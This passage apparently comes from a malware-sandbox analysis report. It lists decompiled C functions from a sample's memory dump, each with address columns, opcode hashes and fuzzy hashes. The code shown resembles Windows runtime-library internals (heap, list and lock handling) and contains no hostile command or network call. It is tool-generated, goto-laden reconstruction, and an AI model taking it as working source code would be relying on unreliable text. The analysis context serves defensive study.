				_t64 =  *0x1155768; // 0x77495768
				if(_t64 != 0x1155768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77495770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0107FFB0(_t53, _t64, 0x1158a6c);
						 *0x115b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E01082280(_t45, 0x1158a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1155768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0107FFB0(_t51, _t64, 0x1158a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E010AB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                                                            0x01113d40
                                                                                                            0x01113d48
                                                                                                            0x01113d52
                                                                                                            0x01113d59
                                                                                                            0x01113d5d
                                                                                                            0x01113d61
                                                                                                            0x01113d63
                                                                                                            0x01113d67
                                                                                                            0x01113d69
                                                                                                            0x01113d72
                                                                                                            0x01113d76
                                                                                                            0x01113d7a
                                                                                                            0x01113d7f
                                                                                                            0x01113d8b
                                                                                                            0x01113d91
                                                                                                            0x01113d91
                                                                                                            0x01113d91
                                                                                                            0x01113d94
                                                                                                            0x01113d96
                                                                                                            0x01113d9d
                                                                                                            0x01113da1
                                                                                                            0x01113db0
                                                                                                            0x01113dba
                                                                                                            0x01113dbc
                                                                                                            0x01113dbc
                                                                                                            0x01113dc6
                                                                                                            0x01113dcb
                                                                                                            0x01113dcf
                                                                                                            0x01113dd1
                                                                                                            0x01113dd4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01113dd9
                                                                                                            0x01113e0c
                                                                                                            0x01113e0c
                                                                                                            0x01113e0f
                                                                                                            0x01113ddb
                                                                                                            0x01113ddb
                                                                                                            0x01113de0
                                                                                                            0x00000000
                                                                                                            0x01113de2
                                                                                                            0x01113de2
                                                                                                            0x01113de4
                                                                                                            0x01113de8
                                                                                                            0x01113deb
                                                                                                            0x01113df1
                                                                                                            0x00000000
                                                                                                            0x01113df3
                                                                                                            0x01113df3
                                                                                                            0x01113df5
                                                                                                            0x01113df8
                                                                                                            0x01113dfa
                                                                                                            0x00000000
                                                                                                            0x01113dfa
                                                                                                            0x01113df1
                                                                                                            0x01113de0
                                                                                                            0x01113e11
                                                                                                            0x01113e11
                                                                                                            0x00000000
                                                                                                            0x01113dfe
                                                                                                            0x01113e04
                                                                                                            0x01113e06
                                                                                                            0x00000000
                                                                                                            0x01113e06
                                                                                                            0x00000000
                                                                                                            0x01113e04
                                                                                                            0x01113d91
                                                                                                            0x01113e15
                                                                                                            0x01113e1a
                                                                                                            0x01113e1f
                                                                                                            0x01113e1f
                                                                                                            0x01113e23
                                                                                                            0x01113e29
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01113e2e
                                                                                                            0x00000000
                                                                                                            0x01113e30
                                                                                                            0x01113e30
                                                                                                            0x01113e35
                                                                                                            0x00000000
                                                                                                            0x01113e37
                                                                                                            0x01113e3e
                                                                                                            0x01113e42
                                                                                                            0x01113e48
                                                                                                            0x01113e4e
                                                                                                            0x00000000
                                                                                                            0x01113e4e
                                                                                                            0x01113e35
                                                                                                            0x00000000
                                                                                                            0x01113e2e
                                                                                                            0x01113e5b
                                                                                                            0x01113e5c
                                                                                                            0x01113e5d
                                                                                                            0x01113e68
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d8f6e161cd1f008754d1c8cbc8e15ac2e6aecb5b3a931ce0c3dfc652fc9f135
                                                                                                            • Instruction ID: 644ead7d17ae5a1d5ce812486cdfbcc1f51a64bc16e96b011d3e66003f7e83b4
                                                                                                            • Opcode Fuzzy Hash: 0d8f6e161cd1f008754d1c8cbc8e15ac2e6aecb5b3a931ce0c3dfc652fc9f135
                                                                                                            • Instruction Fuzzy Hash: 3F318D71609312DFCB18DF29D58095AFBE1FF85624F44456EE8A89B249D730D904CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109A70E Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E0109A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1157b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1157b10 = 8;
					 *0x1157b14 = 0x1157b0c;
					 *0x1157b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0109A990(0x1157b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0109A840(__edx, __ecx, __ecx, _t52, 0x1157b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1157b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1157b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1157b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01084620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1157b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E010AF3E0(_t50,  *0x1157b14, _t8 >> 3);
						_t28 =  *0x1157b14; // 0x0
						__eflags = _t28 - 0x1157b0c;
						if(_t28 != 0x1157b0c) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1157b14 = _t50;
						_t48 = _v12;
						 *0x1157b10 = _t9;
						goto L6;
					}
					 *0x1157b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                            0x0109a713
                                                                                                            0x0109a714
                                                                                                            0x0109a717
                                                                                                            0x0109a71d
                                                                                                            0x0109a720
                                                                                                            0x0109a722
                                                                                                            0x0109a727
                                                                                                            0x0109a74a
                                                                                                            0x0109a754
                                                                                                            0x0109a75e
                                                                                                            0x0109a768
                                                                                                            0x0109a76a
                                                                                                            0x0109a773
                                                                                                            0x0109a78b
                                                                                                            0x0109a790
                                                                                                            0x0109a792
                                                                                                            0x0109a741
                                                                                                            0x0109a741
                                                                                                            0x0109a743
                                                                                                            0x0109a749
                                                                                                            0x0109a749
                                                                                                            0x0109a732
                                                                                                            0x0109a73a
                                                                                                            0x0109a797
                                                                                                            0x0109a79d
                                                                                                            0x0109a7a3
                                                                                                            0x0109a7a9
                                                                                                            0x0109a7b6
                                                                                                            0x0109a7bc
                                                                                                            0x0109a7ca
                                                                                                            0x0109a7e0
                                                                                                            0x0109a7e2
                                                                                                            0x0109a7e4
                                                                                                            0x010d9bf2
                                                                                                            0x00000000
                                                                                                            0x010d9bf2
                                                                                                            0x0109a7ed
                                                                                                            0x0109a7f2
                                                                                                            0x0109a800
                                                                                                            0x0109a805
                                                                                                            0x0109a80d
                                                                                                            0x0109a812
                                                                                                            0x010d9c08
                                                                                                            0x010d9c08
                                                                                                            0x0109a818
                                                                                                            0x0109a81b
                                                                                                            0x0109a821
                                                                                                            0x0109a824
                                                                                                            0x00000000
                                                                                                            0x0109a824
                                                                                                            0x0109a7ae
                                                                                                            0x00000000
                                                                                                            0x0109a7ae
                                                                                                            0x0109a73c
                                                                                                            0x0109a73e
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5feb3899183743ae5c5736fe3ecbf591f2f2297faaf1f253e89cff7874768fb
                                                                                                            • Instruction ID: 84b8f937e837ac969483c5cdbc3ff38fcdb58b26ac85440d5cc872bbfc1c8772
                                                                                                            • Opcode Fuzzy Hash: d5feb3899183743ae5c5736fe3ecbf591f2f2297faaf1f253e89cff7874768fb
                                                                                                            • Instruction Fuzzy Hash: 3D31D4B1700301DFCB29CF08EC92F69B7F9FB84710F544969E26587284D7709941C792
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010961A0 Relevance: .1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E010961A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01095E50(0x10467cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01139D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0106F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                            0x010961b3
                                                                                                            0x010961b5
                                                                                                            0x010961bd
                                                                                                            0x010961c3
                                                                                                            0x010961c7
                                                                                                            0x010961d2
                                                                                                            0x010961ff
                                                                                                            0x010961ff
                                                                                                            0x01096201
                                                                                                            0x01096207
                                                                                                            0x01096207
                                                                                                            0x010961d4
                                                                                                            0x010961d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010961df
                                                                                                            0x010961e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010961e6
                                                                                                            0x010961e8
                                                                                                            0x010961ee
                                                                                                            0x010961ee
                                                                                                            0x010961f9
                                                                                                            0x010d762f
                                                                                                            0x010d7632
                                                                                                            0x010d7635
                                                                                                            0x010d7639
                                                                                                            0x010d7640
                                                                                                            0x010d766e
                                                                                                            0x010d7675
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7681
                                                                                                            0x010d7689
                                                                                                            0x010d768d
                                                                                                            0x010d7691
                                                                                                            0x010d7695
                                                                                                            0x010d7699
                                                                                                            0x010d76af
                                                                                                            0x010d76b5
                                                                                                            0x010d76b7
                                                                                                            0x010d76b7
                                                                                                            0x010d76d7
                                                                                                            0x010d76dc
                                                                                                            0x00000000
                                                                                                            0x010d76dc
                                                                                                            0x010d76a2
                                                                                                            0x010d76a9
                                                                                                            0x010d7651
                                                                                                            0x010d7653
                                                                                                            0x010d7653
                                                                                                            0x010d7656
                                                                                                            0x010d7656
                                                                                                            0x00000000
                                                                                                            0x010d7656
                                                                                                            0x010d7644
                                                                                                            0x010d7646
                                                                                                            0x010d7648
                                                                                                            0x010d7648
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f480189face2e11a1ea46a8c2b3d4dcd38d7d23a655ea34b4255eee4f995554
                                                                                                            • Instruction ID: e4651b71dfae40460a0e619c642b35bfafd4ec25ecd19b88a3c331226d6fa6a9
                                                                                                            • Opcode Fuzzy Hash: 4f480189face2e11a1ea46a8c2b3d4dcd38d7d23a655ea34b4255eee4f995554
                                                                                                            • Instruction Fuzzy Hash: F8316EB16057018FE760CF1DC950B2ABBE5FB88B04F0949ADEAD49B351E7B1D804CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106AA16 Relevance: .1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E0106AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x115d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1157b9c; // 0x0
					_t53 = L01084620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E010AB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E010AF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01076C59(_t53, _t51, _t58) != 0) {
							_t28 = E01095E50(0x104c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0109B230(_v32, _v28, 0x104c2d8, 1,  &_v24);
								_t28 = E0106F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                            0x0106aa25
                                                                                                            0x0106aa29
                                                                                                            0x0106aa2d
                                                                                                            0x0106aa30
                                                                                                            0x0106aa37
                                                                                                            0x0106aa3c
                                                                                                            0x010c4458
                                                                                                            0x010c4458
                                                                                                            0x010c4472
                                                                                                            0x010c4474
                                                                                                            0x010c4476
                                                                                                            0x0106aa64
                                                                                                            0x0106aa74
                                                                                                            0x010c447c
                                                                                                            0x010c4483
                                                                                                            0x010c4492
                                                                                                            0x0106aa52
                                                                                                            0x0106aa54
                                                                                                            0x0106aa5e
                                                                                                            0x010c44a8
                                                                                                            0x010c44ad
                                                                                                            0x010c44af
                                                                                                            0x010c44b6
                                                                                                            0x010c44b6
                                                                                                            0x010c44b9
                                                                                                            0x010c44bc
                                                                                                            0x010c44cd
                                                                                                            0x010c44d3
                                                                                                            0x010c44d6
                                                                                                            0x010c44e1
                                                                                                            0x010c44e1
                                                                                                            0x010c44e6
                                                                                                            0x010c44e8
                                                                                                            0x010c44fb
                                                                                                            0x010c44fb
                                                                                                            0x010c44e8
                                                                                                            0x00000000
                                                                                                            0x0106aa5e
                                                                                                            0x010c4476
                                                                                                            0x0106aa42
                                                                                                            0x0106aa46
                                                                                                            0x0106aa48
                                                                                                            0x0106aa4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 64b4abd2967b6af00321ffb08649098c0e2b5ad85dde8179f1648d23b6939cc0
                                                                                                            • Instruction ID: c2986170af89fa3e6431e86706108a711287e34976c9457a488bd3268ecddf47
                                                                                                            • Opcode Fuzzy Hash: 64b4abd2967b6af00321ffb08649098c0e2b5ad85dde8179f1648d23b6939cc0
                                                                                                            • Instruction Fuzzy Hash: B931E571A0021AEBDF15AF68CD91ABFB7B8FF04700B1140AAF981E7140EB749D51DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A4A2C Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E010A4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x115d360 ^ _t62;
				_v8 =  *0x115d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01082280(_t26, 0x1158608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0107FFB0(_t41, _t51, 0x1158608);
						L2:
						 *0x115b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E010AB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01082280(_t28, 0x1158608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0107FFB0(_t42, _t53, 0x1158608);
							if(_t53 != 0) {
								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0107FFB0(_t41, _t51, 0x1158608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                            0x010a4a2c
                                                                                                            0x010a4a34
                                                                                                            0x010a4a3c
                                                                                                            0x010a4a3e
                                                                                                            0x010a4a48
                                                                                                            0x010a4a4b
                                                                                                            0x010a4a4d
                                                                                                            0x010a4a51
                                                                                                            0x010a4a9c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a4aa3
                                                                                                            0x010a4aa8
                                                                                                            0x010a4aad
                                                                                                            0x010a4ab1
                                                                                                            0x010a4ade
                                                                                                            0x010a4ae3
                                                                                                            0x010a4a5a
                                                                                                            0x010a4a62
                                                                                                            0x010a4a6a
                                                                                                            0x010a4a6e
                                                                                                            0x010df203
                                                                                                            0x010a4a84
                                                                                                            0x010a4a88
                                                                                                            0x010a4a89
                                                                                                            0x010a4a8a
                                                                                                            0x010a4a95
                                                                                                            0x010a4a95
                                                                                                            0x010a4a79
                                                                                                            0x010a4a80
                                                                                                            0x010a4af2
                                                                                                            0x010a4af4
                                                                                                            0x010a4af9
                                                                                                            0x010a4aff
                                                                                                            0x010a4b01
                                                                                                            0x010a4b03
                                                                                                            0x010a4b08
                                                                                                            0x010df20a
                                                                                                            0x010df212
                                                                                                            0x010df216
                                                                                                            0x010df216
                                                                                                            0x010a4b08
                                                                                                            0x010a4b13
                                                                                                            0x010a4b1a
                                                                                                            0x010df229
                                                                                                            0x010df229
                                                                                                            0x010a4b1a
                                                                                                            0x010a4a82
                                                                                                            0x00000000
                                                                                                            0x010a4a82
                                                                                                            0x010a4ab7
                                                                                                            0x010a4acd
                                                                                                            0x010a4acd
                                                                                                            0x010a4ad5
                                                                                                            0x010a4ada
                                                                                                            0x00000000
                                                                                                            0x010a4ada
                                                                                                            0x010a4ac2
                                                                                                            0x010a4acb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a4acb
                                                                                                            0x010a4a53
                                                                                                            0x010a4a53
                                                                                                            0x010a4a58
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9dd0d38f14f186c3588bcbcf502082e8963c874661d61ae2f57dc7a949934adf
                                                                                                            • Instruction ID: 92c4e0f5312ca8ed5f38dcf5eb1169f420c93c235c2a85b949138d76032bc142
                                                                                                            • Opcode Fuzzy Hash: 9dd0d38f14f186c3588bcbcf502082e8963c874661d61ae2f57dc7a949934adf
                                                                                                            • Instruction Fuzzy Hash: 4F313836605311DBC7A1EFA9C941B2ABBE4FFD0710F88446DE8E687641CBB0D841CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A8EC7 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E010A8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x115d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01094E70(0x11586e4, 0x10a9490, 0, 0);
					if( *0x11553e8 > 5 && E010A8F33(0x11553e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x11553e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x11553e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x104bc46;
						_t48 = E010E7B9C(0x11553e8, 0x104bc46, _t67, 0x11553e8, _t70,  &_v140);
					}
				}
				return E010AB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                            0x010a8ec7
                                                                                                            0x010a8ed9
                                                                                                            0x010a8edc
                                                                                                            0x010a8ee6
                                                                                                            0x010a8ee9
                                                                                                            0x010a8eee
                                                                                                            0x010a8efc
                                                                                                            0x010a8f08
                                                                                                            0x010e1349
                                                                                                            0x010e1353
                                                                                                            0x010e135d
                                                                                                            0x010e1366
                                                                                                            0x010e136f
                                                                                                            0x010e1375
                                                                                                            0x010e137c
                                                                                                            0x010e1385
                                                                                                            0x010e1390
                                                                                                            0x010e1391
                                                                                                            0x010e139c
                                                                                                            0x010e139d
                                                                                                            0x010e13a6
                                                                                                            0x010e13ac
                                                                                                            0x010e13b2
                                                                                                            0x010e13b5
                                                                                                            0x010e13bc
                                                                                                            0x010e13bf
                                                                                                            0x010e13c2
                                                                                                            0x010e13c5
                                                                                                            0x010e13c8
                                                                                                            0x010e13cb
                                                                                                            0x010e13ce
                                                                                                            0x010e13d1
                                                                                                            0x010e13d4
                                                                                                            0x010e13d7
                                                                                                            0x010e13da
                                                                                                            0x010e13dd
                                                                                                            0x010e13e0
                                                                                                            0x010e13e3
                                                                                                            0x010e13e6
                                                                                                            0x010e13e9
                                                                                                            0x010e13f6
                                                                                                            0x010e1400
                                                                                                            0x010e1400
                                                                                                            0x010a8f08
                                                                                                            0x010a8f32

                                                                                                            Memory Dump Source
